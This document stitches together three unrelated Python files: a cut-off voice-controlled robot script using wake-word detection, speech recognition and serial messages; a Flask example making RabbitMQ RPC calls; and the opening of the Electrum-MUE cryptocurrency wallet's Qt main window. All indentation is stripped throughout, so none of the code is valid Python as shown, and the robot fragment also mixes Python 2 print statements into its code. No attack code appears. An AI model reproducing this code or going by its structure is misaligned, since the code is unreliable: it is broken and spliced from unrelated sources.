request_needed.value = True
serial_detect = ">d/<"
computer.write(serial_detect)
snowboy.terminate()
def listen_wake_word():
global snowboy
snowboy = snowboydecoder.HotwordDetector("snowboy/examples/Python/resources/models/snowboy.umdl", sensitivity=0.5)
print("starting thread snowboy")
snowboy.start(detected_callback=wakeword_detected, sleep_time=0.25)
def read_ros_buffer(queue):
global ros_buffer
global wakeword_process
while True:
with buffer_lock:
if not ros_buffer.empty():
msg = ros_buffer.get()
update_states(msg)
else:
continue
time.sleep(0.3)
def update_states(msg):
global inventory
topic, msg = msg[:3], msg[3:-1]
#inventory update
if topic == ">i/":
inventory[:] = []
for tool in list(msg.split(",")):
inventory.append(tool)
#state update
elif topic == ">s/":
state.value = int(msg)
if state.value == IDLE:
try:
wakeword_process = multiprocessing.Process(target=listen_wake_word)
wakeword_process.start()
except:
pass
#make yeetbot speak
elif topic == ">m/":
tts(msg)
def record_speech():
global snowboy
global wakeword_process
global request_needed
print("listening...\n")
wakeword_process.terminate()
wakeword_process.join()
subprocess.call(["killall", "arecord"])
time.sleep(0.1)
subprocess.call(["arecord", "recording.wav", "-f", "S16_LE", "-r", "44100", "-d", "4", "-D", "hw:2,0"])
transcribe_file("recording.wav")
request_needed.value = False
wakeword_process = multiprocessing.Process(target=listen_wake_word)
wakeword_process.start()
def tts(text):
print text
client = texttospeech.TextToSpeechClient()
synthesis_input = texttospeech.types.SynthesisInput(text=text)
voice = texttospeech.types.VoiceSelectionParams(
language_code="en-AU",
name="en-AU-Wavenet-B",
ssml_gender=texttospeech.enums.SsmlVoiceGender.MALE)
audio_config = texttospeech.types.AudioConfig(
audio_encoding=texttospeech.enums.AudioEncoding.LINEAR16)
response = client.synthesize_speech(synthesis_input, voice, audio_config)
with open('yeetbot_talks.wav', 'wb') as out:
out.write(response.audio_content)
subprocess.call(["aplay", "yeetbot_talks.wav"])
def transcribe_file(speech_file):
client = speech.SpeechClient()
with io.open(speech_file, 'rb') as audio_file:
content = audio_file.read()
audio = types.RecognitionAudio(content=content)
config = types.RecognitionConfig(
encoding=enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=44100,
language_code='en-GB')
response = client.recognize(config, audio)
#over serial, user response composed as ">u/[choice],[invalid_choice]"
serial_user_response = ""
for result in response.results:
sentence = result.alternatives[0].transcript.split()
serial_user_response = ">u/"
if "return" in sentence:
serial_user_response += "-1,f"
else:
invalid_choice = True
for word in sentence:
for tool in inventory:
if word == tool:
serial_user_response += str(inventory.index(tool)) + ","
invalid_choice = False
print tool
serial_user_response += "t" if invalid_choice else "f"
serial_user_response += "<"
computer.write(serial_user_response)
def main():
global request_needed
init()
while True:
if state.value == IDLE:
time.sleep(0.05)
elif state.value == RECEIVING_REQUEST:
if request_needed.value:
record_speech()
else:
time.sleep(0.05)
elif state.value == RECEIVING_TOOL_EARLY:
time.sleep(0.05)
elif state.value == RECEIVING_TOOL_LATE:
time.sleep(0.05)
elif state.value == RECEIVING_TOOL_ON_TIME:
time.sleep(0.05)
elif state.value == GIVING_TOOL:
time.sleep(0.05)
elif state.value == TRAVELLING:
time.sleep(0.05)
else:
time.sleep(0.05)
if __name__ == '__main__':
main()
|
flask_threaded_rpc_client.py
|
"""
Example of a Flask web application using RabbitMQ for RPC calls.
"""
import threading
from time import sleep
import amqpstorm
from amqpstorm import Message
from flask import Flask
APP = Flask(__name__)
class RpcClient(object):
"""Asynchronous Rpc client."""
def __init__(self, host, username, password, rpc_queue):
self.queue = {}
self.host = host
self.username = username
self.password = password
self.channel = None
self.connection = None
self.callback_queue = None
self.rpc_queue = rpc_queue
self.open()
def open(self):
"""Open Connection."""
self.connection = amqpstorm.Connection(self.host, self.username,
self.password)
self.channel = self.connection.channel()
self.channel.queue.declare(self.rpc_queue)
result = self.channel.queue.declare(exclusive=True)
self.callback_queue = result['queue']
self.channel.basic.consume(self._on_response, no_ack=True,
queue=self.callback_queue)
self._create_process_thread()
def _create_process_thread(self):
"""Create a thread responsible for consuming messages in response
RPC requests.
"""
thread = threading.Thread(target=self._process_data_events)
thread.setDaemon(True)
thread.start()
def _process_data_events(self):
"""Process Data Events using the Process Thread."""
self.channel.start_consuming()
def _on_response(self, message):
"""On Response store the message with the correlation id in a local
dictionary.
"""
self.queue[message.correlation_id] = message.body
def send_request(self, payload):
# Create the Message object.
message = Message.create(self.channel, payload)
message.reply_to = self.callback_queue
# Create an entry in our local dictionary, using the automatically
# generated correlation_id as our key.
self.queue[message.correlation_id] = None
# Publish the RPC request.
message.publish(routing_key=self.rpc_queue)
# Return the Unique ID used to identify the request.
return message.correlation_id
@APP.route('/rpc_call/<payload>')
def rpc_call(payload):
"""Simple Flask implementation for making asynchronous Rpc calls. """
# Send the request and store the requests Unique ID.
corr_id = RPC_CLIENT.send_request(payload)
# Wait until we have received a response.
# TODO: Add a timeout here and clean up if it fails!
while RPC_CLIENT.queue[corr_id] is None:
sleep(0.1)
# Return the response to the user.
return RPC_CLIENT.queue.pop(corr_id)
if __name__ == '__main__':
RPC_CLIENT = RpcClient('localhost', 'guest', 'guest', 'rpc_queue')
APP.run()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_mue as electrum
from electrum_mue import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_mue.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_mue.plugin import run_hook
from electrum_mue.i18n import _
from electrum_mue.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum_mue.transaction import Transaction, TxOutput
from electrum_mue.address_synchronizer import AddTransactionException
from electrum_mue.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_mue.version import ELECTRUM_VERSION
from electrum_mue.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_mue.exchange_rate import FxThread
from electrum_mue.simple_config import SimpleConfig
from electrum_mue.logging import Logger
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_mue.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
maternode_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-mue.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-MUE Testnet" if constants.net.TESTNET else "Electrum-MUE"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend MUEs with it."),
_("Make sure you own the seed phrase or the private keys, before you request MUEs to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
wallet_menu.addSeparator()
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum-MUE preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.monetaryunit.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('monetaryunit:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-MUE",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying MonetaryUnit.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the MonetaryUnit system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/muecoin/electrum-mue/issues\">https://github.com/muecoin/electrum-mue/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum-MUE (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-MUE - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-MUE", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-MUE", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
